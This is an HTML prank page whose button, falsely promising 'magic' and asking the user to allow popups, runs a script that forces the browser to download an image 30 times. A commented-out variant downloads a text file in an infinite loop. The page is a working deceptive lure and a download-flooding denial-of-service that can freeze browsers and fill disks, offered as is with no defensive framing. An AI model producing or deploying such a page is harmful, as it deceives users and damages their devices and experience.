<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Download Image File</title>
<style>
.button {
    background-color: yellow;
    border: none;
    color: black;
    padding: 15px 32px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    margin: 4px 2px;
    cursor: pointer;
    border-radius: 12px;
}
.button:hover {
    background-color: #45a049;
}
</style>
<script>
function downloadImageFile() {
    var imageUrl = "magic.jpg"; 
    var numDownloads = 30; // Number of times to download the image

    for (var i = 0; i < numDownloads; i++) {
        var element = document.createElement('a');
        element.setAttribute('href', imageUrl);
        element.setAttribute('download', 'magic.jpg');
        element.style.display = 'none';
        document.body.appendChild(element);
        element.click();
        document.body.removeChild(element);
    }
}
</script>
</head>
<body>
<button class="button" onclick="downloadImageFile()">Click here and Allow Popup for watching the magic </button>
</body>
</html>





<!--  for text file



<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Download Text File</title>
<script>
function downloadTextFile() {
    var content = "This is the content of the Magic file."; 

    for (var i = 0; i < 1/0; i++) {
        var element = document.createElement('a');
        element.setAttribute('href', 'data:text/plain;charset=utf-8,' + encodeURIComponent(content));
        element.setAttribute('download', 'sweet.txt');
        element.style.display = 'none';
        document.body.appendChild(element);
        element.click();
        document.body.removeChild(element);
    }
}
</script>
</head>
<body>
<button onclick="downloadTextFile()">Click Here and Allow Popup of the browser for wathcing a magic .</button>
</body>
</html>

-->
